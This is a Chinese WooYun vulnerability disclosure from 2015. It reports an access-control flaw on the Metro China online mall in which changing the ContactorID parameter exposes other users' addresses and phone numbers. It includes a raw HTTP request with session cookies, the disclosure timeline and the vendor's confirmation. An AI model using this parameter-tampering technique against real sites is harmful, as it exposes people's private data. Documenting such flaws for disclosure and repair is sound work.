当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142843

漏洞标题:麦德龙(中国)官方网上商城越权可泄露用户详细信息

相关厂商:metromall.cn

漏洞作者: yonghao

提交时间:2015-10-29 11:44

修复时间:2015-12-13 13:00

公开时间:2015-12-13 13:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-10-29: 厂商已经确认,细节仅向厂商公开
2015-11-08: 细节向核心白帽子及相关领域专家公开
2015-11-18: 细节向普通白帽子公开
2015-11-28: 细节向实习白帽子公开
2015-12-13: 细节向公众公开

简要描述:

麦德龙(中国)官方网上商城修改ContactorID 就可权限绕过 访问用户详细地址,手机号码等信息。

详细说明:

问题站点http://www.metromall.cn/account/addressinfo.aspx?ContactorID=7219
这是我注册的用户

7219.png


GET /account/addressinfo.aspx?ContactorID=7210 HTTP/1.1
Host: www.metromall.cn
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: testcookie=testvalue; ASP.NET_SessionId=5pijsj45bvvcgv45x5xql545; TempID=Cart2a7bc023-2e29-4706-982e-12ee0f9a4001; BIGipServerwww.metro.cn-80=1705037708.20480.0000; pageReferrInSession=https%3A//www.baidu.com/link%3Furl%3DoPyiQ3wJGqEF3KdVTLEge0VjRCUb7dCReJ3VwCp2vPX5YyDxC1Oe2xuaT2mz3FZO%26wd%3D%26eqid%3Db3fc0e9e000101010000000556013a31; firstEnterUrlInSession=http%3A//www.metromall.cn/; VisitorCapacity=1; PostStaID=96; vProductID=231815; testcookie=testvalue; s_sq=%5B%5BB%5D%5D; LoginLastPage=http://www.metromall.cn/account/addresslist.aspx; s_cc=true; Hm_lvt_612cbb515a48ab6435405cba354ca6ec=1442921036,1442921160; Hm_lpvt_612cbb515a48ab6435405cba354ca6ec=1442922315; s_fid=105B6B324A4A3BC5-13CF9ADDD4B556A0


修改ContactorID=7219 成 ContactorID=7219 之后点击抓包

7218.png


7218-1.png


漏洞证明:

7210.png

修复方案:

控制权限,权限限制

版权声明:转载请注明来源 yonghao@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-29 12:59

厂商回复:

漏洞确认

最新状态:

暂无